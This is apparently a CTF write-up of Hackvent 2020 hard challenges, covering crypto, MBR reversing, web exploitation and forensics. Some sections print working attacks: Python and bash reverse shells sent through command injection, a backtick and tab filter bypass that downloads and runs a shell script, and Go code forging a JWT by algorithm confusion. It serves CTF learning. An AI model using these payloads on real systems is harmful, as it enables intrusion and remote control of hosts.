The first seven hard challenges included my favorite challenge of the year, Santa’s Special GIFt, where the given file is both a GIF image and a master boot record. Handing it as such allowed me to reverse the code and emulate it to get two flags. There’s another challenge that looks at the failures of CBC on encrypting an raw bitmap image, three web exploitation challenges exploiting command injection, JA3 impresonation, and Python YAML deserialization, and another Rubik’s cube to solve.



hv20-ball13 HV20.13 Twelve steps of christmas
Categories: cryptoCRYPTO
Level: hard
Author: bread

On the ninth day of Christmas my true love sent to me…

nineties style xls, eighties style compression, seventies style crypto, and the rest has been said previously.



  • Wait, Bread is on the Nice list? Better check that comment again…

The file is an old style Excel workbook (.xls):

$ file 5862be5b-7fa7-4ef4-b792-fa63b1e385b7.xls 
5862be5b-7fa7-4ef4-b792-fa63b1e385b7.xls: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Test Data, Author: Unknown Creator, Last Saved By: bread, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Nov 29 23:54:57 2020, Last Saved Time/Date: Sat Dec 12 12:43:38 2020, Security: 0


Identify Two Data Blobs

The Excel book has a table of names with addresses, comments, and a naught or nice, as well as images down the right side:


The workbook is protected with a password, so preventing clicking into the table or anything else to see what’s going on. There are multiple ways around this.

One way is to grab the VBA from one of many sites that will brute force crack this password. I’ll hit Alt+F11 to open the Macro editor, insert a module, paste in the code, and hit F5 to run it. Five seconds later it pops up with the password:


Alternatively, an Office document is just a zip file which can be decompresses and then the two pieces of data needed for the challenge can be pulled from the resulting files.

With the sheet unlocked, there are two bits of data to find. All of the cells in the Comment column are nonsense text except one:


With the workbook unlocked, the full text of that cell can be read:

Not a loaf of bread which is mildly disappointing 1f 9d 8c 42 9a 38 41 24 01 80 41 83 8a 0e f2 39 78 42 80 c1 86 06 03 00 00 01 60 c0 41 62 87 0a 1e dc c8 71 23 Why was the loaf of bread upset? His plan were always going a rye. How does bread win over friends? “You can crust me.” Why does bread hate hot weather? It just feels too toasty.

The hex string in the middle is of interest.

The other is a bit trickier to spot. Inside the image of a gift box there’s some text:


It says “part 9”. Clicking on it shows the formula: =EMBED("Packager Shell Object",""). Right clicking on it gives a menu:


Selecting Properties gives details about the embedded object:


The file is in \Appdata\Local\Temp\, and it contains 36547 lines of hex data, 60 characters across per line:


As mentioned above, both of these could be found without excel by just renaming the file as .zip and decompressing it, generating the following files:

$ find . -type f
./MBD018CB2C0/[1]Ole10Native   <-- contains large hex blob
./Workbook                     <-- contains short hex blob

Linux tools will act a bit weird finding the small hex blob in Workbook. For some reason, that cell is represented in UTF-16 two byte characters, so grep and even searching in less will miss it. strings will find it with the -el flag:

$ strings -n 100 -el Workbook
Not a loaf of bread which is mildly disappointing 1f 9d 8c 42 9a 38 41 24 01 80 41 83 8a 0e f2 39 78 42 80 c1 86 06 03 00 00 01 60 c0 41 62 87 0a 1e dc c8 71 23 Why was the loaf of bread upset? His plan were always going a rye. How does bread win over friends? 

Small Blob

Starting with the small blob, it doesn’t decode to anything immediately obvious:

$ cat c9
1f 9d 8c 42 9a 38 41 24 01 80 41 83 8a 0e f2 39 78 42 80 c1 86 06 03 00 00 01 60 c0 41 62 87 0a 1e dc c8 71 23 
$ cat c9 | xxd -r -p | xxd
00000000: 1f9d 8c42 9a38 4124 0180 4183 8a0e f239  ...B.8A$..A....9
00000010: 7842 80c1 8606 0300 0001 60c0 4162 870a  xB........`.Ab..
00000020: 1edc c871 23                             ...q#

The magic bytes of 0x1f9d do match that of gzipped data. xxd can convert the hex to binary and zcat will decompress it (back into xxd to see the result):

# cat c9 | xxd -r -p | zcat | xxd
00000000: 424d 4e88 1200 0000 0000 8a00 0000 7c00  BMN...........|.
00000010: 0000 2702 0000 2702 0000 0100 2000 0300  ..'...'..... ...
00000020: 0000 c487 1200 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000                           ......

Now it matches the signature of a Bitmap file (BM). That’s interesting, but saving that to disk and trying to open it fails. Looking a bit closer at the Bitmap file format, it’s clear this cuts off right in the middle of the header:

424d:          BM       Windows header
4e881200: 1214542       Size of entire file
00000000:       0       reserved
8a000000:     138       offset to image data
7c000000:     124       size of header
27020000:     551       width (pixels)
27020000:     551       height (pixels)
0100:           1       planes
2000:          32       bits per pixel
03000000:       3       BI_BITFIELDS, no pixel compression
c4871200: 1214404       size of raw bitmap data (bytes)
00000000:       0       print resolution
00000000:       0       print resolution 
00000000:       0       number of colors in palette
00000000:       0       number of important colors in palette

The V5 header in this file only has 40 bytes, but the length says it’ll be 124.

Not much else to be done with this for now.

Large Blob

The larger blob also starts out as gzipped data, and when decompressed, it looks like openssl encrypted data (as it starts out as Salted__):

# cat part9 | xxd -r -p | zcat | xxd | head -5
00000000: 5361 6c74 6564 5f5f 5cea a7a1 221f 1438  Salted__\..."..8
00000010: 3077 9172 c85b 8583 d13e 829a e92f d502  0w.r.[...>.../..
00000020: 640f 42e3 5dad 366e ec19 7fc4 ffbd c276  d.B.].6n.......v
00000030: 6cdc 04d4 a42a 0abc 56b7 1f75 ac60 baab  l....*..V..u.`..
00000040: 56b7 1f75 ac60 baab 0d6b cb7b 9967 6792  V..u.`...k.{.gg.

I spent a long time trying to figure out how to decrypt this data, which isn’t necessary for the challenge.

Generate Image

The clues are here for the next step, though it’s easy to miss:

  • BMP header
  • “seventies style crypto”
  • the size of the encrypted file is almost exactly the same size as the BMP would have been according to the header (18 bytes off)

All of this is supposed to point to this:


This is a classic example as to why electronic code book encryption is not secure. The reason is that each block is encrypted independently, so if any two blocks are the same, the encrypted output for those blocks will also be the same, leaving features in the image that can be recognized.

I’ll combine the two parts:

$ cat c9 | xxd -r -p | zcat > combined.bmp
$ cat part9 | xxd -r -p | zcat >> combined.bmp 

And open it in an image viewer:

That’s an image, and there’s clearly a QRcode in there.

Clean Up

I cleaned up the file in Gimp. First, I removed the alpha channel by right-clicking on the layer and selecting “Remove Alpha Channel”. Now I zoomed in on the top left of the QRCode:


I used the color picker tool to click on a pixel that I know should be black. Then in Colors –> Map –> Color Exchange…, select the new color as black. It will replace all the pixels of that color as black. After doing that that a handful of times, changing colors that I know what they should be, the image looks like:

Because QRCodes are so robust to errors, this is plenty of detail to get the flag out (I could have stopped much earlier). or a phone app can read the flag at this point.

Flag: HV20{U>watchout,U>!X,U>!ECB,Im_telln_U_Y.HV2020_is_comin_2_town}



hv20-ball14 HV20.14 Santa's Special GIFt
Categories: forensicFORENSIC
reverse engineeringREVERSE ENGINEERING
Level: hard
Author: The Compiler

Today, you got a strange GIFt from Santa:


You are unsure what it is for. You do happen to have some wood lying around, but the tool seems to be made for metal. You notice how it has a rather strange size. You could use it for your fingernails, perhaps? If you keep looking, you might see some other uses…


Identify MBR

The gif image is in fact a GIF, and it’s relatively small (there’s a hint in the prompt about the size and it’s having other uses, but I missed those originally):

$ file 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif
5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif: GIF image data, version 89a, 128 x 16
$ ls -l 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif | awk '{print $5 " " $9}'
512 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif

Running strings on it puts out an odd-looking string at the end:

$ strings 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif

It’s actually ROT13:

$ strings 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif | tr 'a-zA-Z' 'n-za-mN-ZA-M' | tail -1

--keep-going is a flag for the file command (which is also what the image is of). Running file again with this flag finds more matches:

root@kali# file --keep-going 5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif
5625d5bc-ea69-433d-8b5e-5a39f4ce5b7c.gif: GIF image data, version 89a, 128 x 16\012- DOS/MBR boot sector\012-  DOS/MBR boot sector\012- data

In addition to a GIF, this file matches the signautre for a DOS/MBR, or master boot record. An MBR is the first 512 bytes in the first sector on a drive, and it provides the instructions to load the OS. The first bit is code, with some metadata and flags coming at the end (examples in the Wikipedia link).

Static Analysis

I’ll open the file in Ida, selecting MetaPC as the Processor and setting the offset to 0x7c00 (standard for MBR).


After selecting 16-bit mode when prompted, it comes up as just a series of bytes:


By going to the top of the undefined bytes and hitting “c”, it will turn that into code. I had to do that in a couple places to get code up through 0x7c9d.

Scrolling down through some garbage looking stuff (probably the GIF header), at byte 23 there’s what looks like a loop:

image-20201215072923688Click for full size image

Ida is nice enough to label the int 10 call with what’s going on there, but it’s also described here. $AH is used to determine what function is called, and in this case, at the top, that’s set to 0xe, which is teletype output, with the inputs as descripted in the Ida comment. I’ll come back to this loop later.

The next section scrolls that entire page off the screen, and then sets the cursor position (using functions 0x7 scroll down window and then 0x2 set cursor position).

image-20201215073336125Click for full size image

Now comes the interesting loop:

image-20201215073415351Click for full size image

It initializes dx = 3, si = 0x144, and di = 0. Then, there’s a loop such that when si is 0xe0, it reaches hlt (halt). Within that loop, if di is zero, it prints \r\n (0x0a and 0x0d) followed by 16 spaces (0x20), and then sets di to 0x19. Then, regardless of the value of di, it does some obfuscating math to eventually print a character at an offset into 0x7cf0. Finally, it decrements di and si, and then loops.

Solve Via Emulation

Bochs is an emulator for this kind of thing. It’s a bit unintuitive to get set up, and after playing with both, I had success with the GUI version on Windows. From the start menu, I opened the Disk and Boot options, and set the input image as a floppy:


In the Boot Options tab, Boot drive #1 was already floopy, so I left that.

On starting the machine it shows an partial image:


It is actually blinking, I think because it’s reaching the hlt instruction, crashing, and then restarting, but I’m not 100% sure of that. Hitting the Suspend button will freeze it in place while it waits for the prompt to be resolved.

It is only printing the top part of the QRcode. I’ll remember from static analysis that it was breaking when si reached 0xe0, not 0, which was odd. I opened the image in a hex editor, found that 0xe0, and changed it to a 0x00. On re-running, it prints the full QR:


Flag: HV20{54n74'5-m461c-b00t-l04d3r}

Solve Via Re-Implementation

Instead of running it, I could just look at that loop and recreate it. It basically looks like this in Python:

si = 0x144
di = 0
while si > 0:
    if di == 0:
        print("\n   ", end="")
        di = 0x19
    cx = (si & 3) << 1
    bx = si >> 2
    bp = (_9e[bx] >> cx) & 3
    print(_f0[bp], end="")
    si -= 1
    di = di - 1

_9e and _f0 are offsets into the data at the end of the code. I can grab those and drop them into the script. The indexes put into _9e are si >> 2, which ranges from 0 to 81. The inputs to _f0 interestingly are all some number & 3, which takes the low two bits of that number. So it will range from 0-3.

_f0 = binascii.unhexlify("dbdfdc20")
_9e = binascii.unhexlify("555ddfd55d550d5e6f0339572311941bde0c8c2b37bf8053154e54949ad65f2da1cfcf508a0fa59da9ed2984486c9cf8448e51b2a9b91f39545537637655c5d57c49e45c0d0373a416333054c544974c5500")

There’s one last trick to get this to work. In _f0, the four values are 0xdb, 0xdf, 0xdc, and 0x20. The last is the space character. But the rest are not ASCII. This table shows that they are █, ▀, and ▄. So where _f0[0] returns 219, I need it to print the full block character. In many cases, I could just look for other ASCII characters to replace them with, but the way the two half blocks are used, it isn’t one character per pixel. This post suggested using cp437 as the character set to get this, and it worked:

print(bytes((_f0[bp],)).decode('cp437'), end="")

All together, the script is:

#!/usr/bin/env python3

import binascii

_f0 = binascii.unhexlify("dbdfdc20")
_9e = binascii.unhexlify("555ddfd55d550d5e6f0339572311941bde0c8c2b37bf8053154e54949ad65f2da1cfcf508a0fa59da9ed2984486c9cf8448e51b2a9b91f39545537637655c5d57c49e45c0d0373a416333054c544974c5500")

si = 0x144
di = 0
while si > 0:
    if di == 0:
        print("\n   ", end="")
        di = 0x19
    cx = (si & 3) << 1
    bx = si >> 2
    bp = (_9e[bx] >> cx) & 3
    print(bytes((_f0[bp],)).decode("cp437"), end="")
    si -= 1
    di = di - 1

And it prints the QR:




hv20-ballH2 HV20.H2 Oh, another secret!
Categories: hiddenHIDDEN
Level: hard
Author: The Compiler

We hide additional flags in some of the challenges! This is the place to submit them. There is no time limit for secret flags.


The loop I skipped over int the static analysis in HV20.14 actually holds the hidden flag:

image-20201215072923688Click for full size image

It’s a pretty simple loop, with a counter bx starting at 0, pulling a character from two different arrays, xoring the results, and printing that character. The loop breaks when the first array reached a null character.

I can pull both arrays, and recreate this in Python (I already pulled _9e in the HV20.14 solution, I’ll just update that script):

#!/usr/bin/env python3

import binascii

_f0 = binascii.unhexlify("dbdfdc20")
_f4 = binascii.unhexlify("585797836f6576365e675d644d3ca575f37ce01f06d1ad6624783ca3e7")
_9e = binascii.unhexlify("555ddfd55d550d5e6f0339572311941bde0c8c2b37bf8053154e54949ad65f2da1cfcf508a0fa59da9ed2984486c9cf8448e51b2a9b91f39545537637655c5d57c49e45c0d0373a416333054c544974c5500")

print('HV20.14 flag:')
si = 0x144
di = 0
while si > 0:
    if di == 0:
        print("\n   ", end="")
        di = 0x19
    cx = (si & 3) << 1
    bx = si >> 2
    bp = (_9e[bx] >> cx) & 3
    print(bytes((_f0[bp],)).decode("cp437"), end="")
    si -= 1
    di = di - 1

hidden = "".join([chr(x ^ y) for x, y in zip(_f4, _9e)])
print(f"Hidden flag: {hidden}")

Flag: HV20{h1dd3n-1n-pl41n-516h7}



hv20-ball15 HV20.15 Man Commands, Server Lost
Categories: web securityWEB SECURITY
penetration testingPENETRATION TESTING
Level: hard
Author: inik

Elf4711 has written a cool front end for the linux man pages. Soon after publishing he got pwned. In the meantime he found out the reason and improved his code. So now he is sure it’s unpwnable.

There’s a link to get a VPN connection and to start a docker instance with the target website.



The website is an online GUI interface to the Unix Manual Pages or “man”:

At the bottom of the page, there’s a link to the source for the page:


The source shows a Flask Python application. In Flask, routes are defined with function decorators. For example, this function defines what happens when someone visits the page root:

def main():
  return redirect('/man/1/man')

In this case, it just redirects to /man/1/man, which is what is pictured above. In the source, there are three additional routes:

  • /section and /section/<nr>
  • /man and /man/<section>/<command>
  • /search

In /search, there’s a comment reference to how it used to be vulnerable, but no longer is because of a cleaning function:

@app.route('/search/', methods=["POST"])
def search(search="bash"):
  search = request.form.get('search')
  # FIXED Elf4711: Cleaned search string, so no RCE is possible anymore
  searchClean = re.sub(r"[;& ()$|]", "", search)
  ret = os.popen('apropos "' + searchClean + '"').read()
  return render_template('result.html', commands=parseCommands(ret), search=search)

os.popen is going to run commands at the OS level, so it is a good idea to remove those characters which can be used to get command injection (I’ll bypass this filter later).

Having seen that, something interesting jumps out looking in the /section route:

def section(nr="1"):
  ret = os.popen('apropos -s ' + nr + " .").read()
  return render_template('section.html', commands=parseCommands(ret), nr=nr)

Just like the search function above, it is taking user input, building a string to pass to os.popen. But this time, there’s no input sanitization. There’s a ton of ways to take apropos -s <input> . and make it run what arbitrary code. ; can break the previous command and start another. $() or ```` `` can run commands in a subshell. The limiting factor here is that the input is passed via the url, not in the POST body. That limits what can be sent, as characters such as / seem to break it.

Shell Via /section/

I’ll show the easier path first. I’ll grab a Python reverse shell from PentestMonkey, and after updating the IP and port it looks like:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

However, this doesn’t return a shell. It turns out that python isn’t installed on the box, which is becoming more and more common. Changing the command above to invoke with python3 fixes the issue. After some URL encoding, this url in Firefox will trigger a shell:'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.13.0.10%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)'%60

After a second, at the nc listener on port 443, a shell comes back:

root@kali# nc -lvnp 443
Ncat: Version 7.80 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
$ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)

The flag is in the same directory:

$ cat flag

Flag: HV20{D0nt_f0rg3t_1nputV4l1d4t10n!!!}

Leak Flag

If I didn’t want to stand up the VPN and worry about getting a shell, I could just use the command injection to generate output that will be displayed back to me via the webpage.

If ;ls -la is passed into /section, the command passed to os.popen is apropos -s ;ls -la .. That will run, but none of the results will show on the screen:


The reason is that the results are being passed to parseCommands and the results are displayed back:

def parseCommands(ret):
  commands = []
  for line in ret.split('\n'):
    l = line.split(' - ')
    if (len(l) > 1):
      m = l[0].split();
      manPage = ManPage(m[0], m[1].replace('(', '').replace(')',''), l[1])
  return commands

It loops over the lines, and splits each line on [space]-[space], and only if there was that split results in multiple strings does it continue to then split on space, and build the output. So the command output needs to be of the form m0 m1 - l1, or else it will not be displayed. If there’s no [space]-[space], it just won’t print that line. If there’s no space to split on in the first result before the [space]-[space], it will crash and return 500 when it tries to access m[1].

I used awk to manipulate the output from the command such that it fits this template. ls -la | awk '{print m0 m1 - $0}' will take the output, and for each line, add m0 m1 - before it. So visiting /section/;ls -la | awk '{print "m0 m1 - " $0}'; returns:


Seeing flag right there in the system root, /section/;cat flag | awk '{print "m0 m1 - " $0}'; will return it:


Elf4711 thinks that they patched the /search path, but that is a very hard thing to do, and this one isn’t good enough. I’m not able to use any of the following characters: [;& ()$|]. Backticks are still available for subshell execution. The biggest challenge is that it is filtering the space character. One way to bypass that is to use the $IFS variable, but $ is not allowed. I used tab, which url-encodes to %09, in a two request solution to upload a reverse shell and then execute it.

I created a simple reverse shell script named


bash -i >& /dev/tcp/ 0>&1

To upload this, I started a Python webserver and sent the following request:

POST /search/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: close
Upgrade-Insecure-Requests: 1


A second later, there was a hit at the webserver:

root@kali# python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [15/Dec/2020 06:19:52] "GET / HTTP/1.1" 200 -

If that worked, the script is now sitting at /tmp/a. The next command will run that with bash:

POST /search/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Connection: close
Upgrade-Insecure-Requests: 1


A shell comes back to nc:

root@kali# nc -lnvp 443                      
Ncat: Version 7.80 ( )                             
Ncat: Listening on :::443                                                
Ncat: Listening on                                           
Ncat: Connection from                                        
Ncat: Connection from
$ id                                                                     
uid=1000(runner) gid=1000(runner) groups=1000(runner) 



hv20-ball16 HV20.16 Naughty Rudolph
Categories: programmingPROGRAMMING
Level: hard
Author: dr_nick

Santa loves to keep his personal secrets on a little toy cube he got from a kid called Bread. Turns out that was not a very good idea. Last night Rudolph got hold of it and frubl’d it about five times before spitting it out. Look at it! All the colors have come off! Naughty Rudolph!



  • The flag matches /^HV20{[a-z3-7_@]+}$/ and is read face by face, from left to right, top to bottom
  • The cube has been scrambled with ~5 moves in total


Define Problem

I last dealt with an .stl file in last year’s challenge, day two. Double clicking on a Windows machine will open it in Paint3D, which gives enough information to solve this challenge. It’s another Rubik’s cube:

I know from the hints that the flag is read face by face, top to bottom, left to right.

There’s another thing that’s important to know - There are six faces on a rubik’s cube that don’t move, the middle on each side, meaning that I know which face the flag will start on. The fifth characters in the flag will be in a middle spot, that’s a { (assuming it starts with HV20{). Looking at the cube, there’s a side that has { in the middle:

So I’ll make that the top face. It’s important to orient it that was as well, so that the { is facing the right direction. That will leave 6 as the first spot on the top of the cube. When I read the cube into my program, I’ll want it to look like:

HV7 _we o@s isl
h_e 0k_ _t_ nso
oa_ cda 4r5 2c_


I’ll write a program to brute force all possible five-move combinations. I actually made the mistake of using itertools.permutations to calculate this, when it really should be itertools.product. With permutations, you’d never get ABCDA, because move A won’t show up twice. But, it the actual solution doesn’t have any move more than once, so either will solve (and permutations much faster). The rest is relatively straight forward - get the list of five-move options, loop over them, using this rubik-cube python library to handle the moves, and check if the flag starts and ends as expected:

#!/usr/bin/env python3

import re
import sys
from itertools import product,permutations
from rubik.cube import Cube

    num_moves = int(sys.argv[1])
except (IndexError, ValueError):
    num_moves = 5

cube_str = '6_ei{aes3HV7_weo@sislh_e0k__t_nsooa_cda4r52c__nsllt}ph'
assert re.match(r'[HVa-z02-7_@{}]+', cube_str)
moves_list = ['F', 'R', 'U', 'L', 'B', 'D',
              'Fi', 'Ri', 'Ui', 'Li', 'Bi', 'Di',
              'F F', 'R R', 'U U', 'L L', 'B B', 'D D']

#moves_to_try = permutations(moves_list, num_moves) # works, but technically incomplete
moves_to_try = product(moves_list, repeat=num_moves)

for moves in moves_to_try:
    mv_str = ' '.join(moves)
    c = Cube(cube_str)
    f = ''.join(c._color_list())
    if f.startswith('HV20') and f.endswith('}'):
        flag = f[:12] + f[21:24] + f[33:36] + f[12:15] + f[24:27] + f[36:39] + f[15:18] + f[27:30] + f[39:42] + f[18:21] + f[30:33] + f[42:]

Running this is quite slow (especially on my under-powered machine). But it still drops three potential flags, and one is clearly the right one:

$ time python3 
('B', 'Li', 'Di', 'Bi', 'Ri')
('Li', 'Fi', 'R', 'Bi', 'R R')
('Li', 'Bi', 'D', 'Fi', 'R R')

real    39m52.122s
user    39m50.727s
sys     0m0.104s

Flag: HV20{no_sle3p_since_4wks_lead5_to_@_hi6hscore_a7_last}

If I did use permutations instead of product (an incomplete search), it does still find the flag, and much faster:

$ time python3 
('B', 'Li', 'Di', 'Bi', 'Ri')
('Li', 'Fi', 'R', 'Bi', 'R R')
('Li', 'Bi', 'D', 'Fi', 'R R')

real    22m27.955s
user    22m27.171s
sys     0m0.112s



hv20-ball17 HV20.17 Santa's Gift Factory Control
Categories: cryptoCRYPTO
web securityWEB SECURITY
Level: hard
Author: fix86

Santa has a customized remote control panel for his gift factory at the north pole. Only clients with the following fingerprint seem to be able to connect:



Connect to Santa’s super-secret control panel and circumvent its access controls.



Just visiting the page gives a 403 forbidden:


That makes sense given the prompt that it only accepts requests from the given fingerprint. That fingerprint is a JA3 fingerprint, which is composed of various settings in the TLS Client Hello message, including TLS version, cipher suites offered, and extensions.

Get Access

Rather than try to set up a computer to match these settings exactly, I found this Go package that can take a JA3 string and create an HTTP client that is configured to look like it. The only downside is that I had to learn Go, which is totally new to me (so don’t take any Go programming tips from me!).

To check that I was doing it right, I created the transport to match the signature, and made a request of

package main

import (

func main() {

    tr, _ := ja3transport.NewTransport("771,49162-49161-52393-49200-49199-49172-49171-52392,0-13-5-11-43-10,23-24,0")
    client := &http.Client{Transport: tr}
    resp, _ := client.Get("")

    body, _ := ioutil.ReadAll(resp.Body)

    sb := string(body)

It returns the JA3 fingerprint for the client, and it matches:

root@kali# go run main-0-check_ja3er.go 
{"ja3_hash":"a319533bd1a703430d9ad0e21c08c62f", "ja3": "771,49162-49161-52393-49200-49199-49172-49171-52392,0-13-5-11-43-10,23-24,0", "User-Agent": "Go-http-client/1.1"}

After updating the URL to the hackvent target, it returns a page:

root@kali# go run main-1-get_page.go 
<!DOCTYPE html>
        <meta charset="utf-8">
        <title>Santa's Control Panel</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link href="static/bootstrap/bootstrap.min.css" rel="stylesheet" media="screen">
        <link href="static/fontawesome/css/all.min.css" rel="stylesheet" media="screen">
        <link href="static/style.css" rel="stylesheet" media="screen">
        <div class="login">
            <form action="/login" method="post">
                <label for="username">
                    <i class="fas fa-user"></i>
                <input type="text" name="username" placeholder="Username" id="username">
                <label for="password">
                    <i class="fas fa-lock"></i>
                <input type="password" name="password" placeholder="Password" id="password">
                <input type="submit" value="Login">

Given this is a login form, I wanted to try some basic credentials like “admin” / “admin”. I learned how to craft a POST request, and I added code to print the response headers as well.

package main

import (

func main() {

    tr, _ := ja3transport.NewTransport("771,49162-49161-52393-49200-49199-49172-49171-52392,0-13-5-11-43-10,23-24,0")
    client := &http.Client{Transport: tr}

    data := url.Values {
        "username": {"admin"},
        "password": {"admin"},
        "submit": {"Login"},

    resp, _ := client.PostForm("", data)
    body, _ := ioutil.ReadAll(resp.Body)

    headers := resp.Header
    for h := range headers {
        fmt.Println(h + ": " + headers.Get(h))

No matter what creds I tried, I always got the login form back with this message included:

<div class="msg">Invalid credentials.</div>

However, when the username was “admin”, this comment was added:

<!--DevNotice: User santa seems broken. Temporarily use santa1337.-->

Trying to login as santa1337 didn’t provide anything useful.

The headers were interesting. On a failed login, it still tried to set a session cookie:

Server: nginx/1.19.6
Date: Thu, 17 Dec 2020 17:56:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1275
Connection: keep-alive
Set-Cookie: session=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ii9rZXlzLzFkMjFhOWY5NDUifQ.eyJleHAiOjE2MDgyMzE0MDMsImlhdCI6MTYwODIyNzgwMywic3ViIjoibm9uZSJ9.wn_Gl2P82bulHg8CehzTcT4411abUh5zPj9n5QjCVIGQV8xU9obWCA0CxPgu_dz-fMDwUOFUZcOs74iq_fPSdSX02fT4EeWPWls2RQ2jvLQNbXSpFZp5NjGjuF3_tpzUGlymVx3_wVtjYg3ArpgHMfWpRwXpS2B5vPLsZWsPkdQx8co73lQfLrx_jPfXrimWINqmvs81M-wf8GZh3oPAFu5Th9Md6GKhyqZbDZzccFS3_0xMS9FrJhHCIP3opYLINb_1KhOJDvY2Dl3tTBycRSWij487VqEwRQ8kCFVqWMwFG3ElR99JXwOt0HT4mseXH6lZQYSbwTBiCDv8N8ReGw; Path=/

Analyze JWT and Get Public Key

My go-to place to see what’s in a JWT is Plugging this one in there shows that it’s using RSA256, gives an interesting key id (kid) path, and hold data for presumably the user (sub) currently set to none, as well as validity times:

image-20201217130151085Click for full size image

As the kid looks like a path on the server, I’ll try to grab it:

package main

import (

func main() {

    tr, _ := ja3transport.NewTransport("771,49162-49161-52393-49200-49199-49172-49171-52392,0-13-5-11-43-10,23-24,0")
    client := &http.Client{Transport: tr}
    resp, _ := client.Get("")
    body, _ := ioutil.ReadAll(resp.Body)

It does return the key:

root@kali# go run main-3-leak-public.go 
-----END PUBLIC KEY-----

Algorithm Confusion Attack

RS256 is an RSA signature, where a private key is used to sign the JWT, and then the public key is used to verify it. The alternative signature is HS256, which is a keyed SHA256 hash signature, where the key is symmetric for signing and verification.

If the server is trusting the JWT to tell it what algorithm is in use, there’s an attack where I use the RSA public key to sign as the private key in HS256. If the server just uses the public key with the algorithm in the JWT, then it should validate my forged cookie.

Now the script will read the public key, and create a new JWT with a really long valid time window and the user santa1337 as described in the comment. It’ll sign the JWT using the RSA public key string as the HMAC secret in HS256, and submit that to the site in a GET request:

package main

import (

func main() {

    hmacSecret, _ := ioutil.ReadFile("public.key")

    jwt_token := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims {
        "sub": "santa1337",
        "iat": time.Date(2020, 12, 17, 0, 0, 0, 0, time.UTC).Unix(),
        "exp": time.Date(2021, 12, 1, 0, 0, 0, 0, time.UTC).Unix(),
    jwt_string, _ := jwt_token.SignedString(hmacSecret)

    base_url := ""
    tr, _ := ja3transport.NewTransport("771,49162-49161-52393-49200-49199-49172-49171-52392,0-13-5-11-43-10,23-24,0")
    client := &http.Client{Transport: tr}

    req, _ := http.NewRequest("GET", base_url, nil)
    req.AddCookie(&http.Cookie{Name: "session", Value: jwt_string})
    resp, _ := client.Do(req)
    body, _ := ioutil.ReadAll(resp.Body)

Running this returns the logged in page, and I can see the flag in a comment:

root@kali# go run main.go 
<!DOCTYPE html>
        <meta charset="utf-8">
        <title>Santa's Control Panel</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link href="static/bootstrap/bootstrap.min.css" rel="stylesheet" media="screen">
        <link href="static/fontawesome/css/all.min.css" rel="stylesheet" media="screen">
        <link href="static/style.css" rel="stylesheet" media="screen">
    <!--Congratulations, here's your flag: HV20{ja3_h45h_1mp3r50n4710n_15_fun}-->
    <body class="loggedin">
        <nav class="navtop">
                <h1>Gift Factory Control</h1>
                <a href="/"><i class="fas fa-home"></i>Home</a>
                <a href="/logout"><i class="fas fa-sign-out-alt"></i>Logout</a>

Flag: HV20{ja3_h45h_1mp3r50n4710n_15_fun}

Just for fun, I downloaded the images and style sheets for the site so it would render in a browser:

An interesting programming exercise would be to write a proxy in Go such that Firefox could just interact with the site without having to update the script each time.



hv20-ball18 HV20.18 Naughty Rudolph
Categories: forensicFORENSIC
Level: hard
Author: darkstar

Santa has forgotten his password and can no longer access his data. While trying to read the hard disk from another computer he also destroyed an important file. To avoid further damage he made a backup of his home partition. Can you help him recover the data.

When asked he said the only thing he remembers is that he used his name in the password… I thought this was something only a real human would do…



Enumeration / Background

The file (once uncompressed with bzip2) is a linux filesystem image:

$ file 9154cb91-e72e-498f-95de-ac8335f71584.img 
9154cb91-e72e-498f-95de-ac8335f71584.img: Linux rev 1.0 ext2 filesystem data, UUID=5a9bec26-3f99-4101-bc44-153139202629 (extents) (64bit) (large files) (huge files)

After mounting it (mount 9154cb91-e72e-498f-95de-ac8335f71584.img /mnt as root), the files are accessible:

# find . -type f
...[sniped more ECRYPTFS files in .Private]...

This image contains an eCryptfs-encrypted file system. This superuser post explains the files used by eCryptfs:

  • auto-mount tells the system to automatically mount at login
  • auto-umount tells the system to automatically umount at logout
  • Private.mnt defines where the encrypted file system is mounted
  • Private.sig contains the signature of the mountpoint passphrase
  • wrapped-passphrase is the key material used to decrypted the drive encrypted with a user’s passphrase.

The wrapped-passphrase file is missing in this image. This must be the “important file” Santa destroyed.

Recover wrapped-passphrase

This presentation from Sylvain Pelissier talks about an issue where a default salt was used, which made cracking these passwords very easy. With the update, now there’s a random salt, and the structure of the file looks like (image from the previous link):


